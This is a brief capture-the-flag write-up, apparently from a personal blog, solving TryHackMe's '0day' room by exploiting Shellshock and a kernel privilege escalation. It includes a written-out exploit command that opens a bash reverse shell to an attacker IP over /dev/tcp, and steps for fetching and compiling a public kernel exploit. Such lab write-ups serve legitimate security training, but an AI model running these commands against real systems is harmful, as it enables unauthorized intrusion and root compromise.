---
title: 0day
published: true
tags: [CVE, kernel exploit, shell shock, 0day]
---

<https://tryhackme.com/room/0day> Exploit Ubuntu, like a turtle in a hurricane.

# Notes

nmap scans give us 22 and 80

exploring the site with gobuster we find a RSA Private key in `/backup/` but this seems to be a rabbit hole....

running nikto on the site we get that the site appears vulnerable to checllshock CVE-2014-6278

this exploit works by abusing a vulnerability that exists becuause Bash is operating as a parser for CHI scripts on web servers and the way it handles specifically-formatted enviroment variables, namely explorted shell functions.

using the exploit 34766 we can take advantage of this.

- `php 34766.php -u http://0day.thm/cgi-bin/test.cgi -c "sh -i >& /dev/tcp/10.2.3.64/6669 0>&1"`

And we can see we get a shell from the target and capture user.txt.

# Privesc

- `uname -a` we see the system is running ubuntu 3.13.

- `searchsploit -m 37292` to copy the vulnerability to the directory we are in. I was having trouble compiling with gcc on the target so we much use `dos2unix 37292.c` before sending in order to compile correctly.

now when trying to compile we get an error `gcc: error trying to exec 'cc1': execvp: No such file or directory`. Looks like its unable to find `cc1`. `cc1` is the program responsible for converting C code into assembler. To fix we can fix our PATH. `export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin` Running the compiler again we can then execute our exploit. Which then we can pickup the last root.txt flag.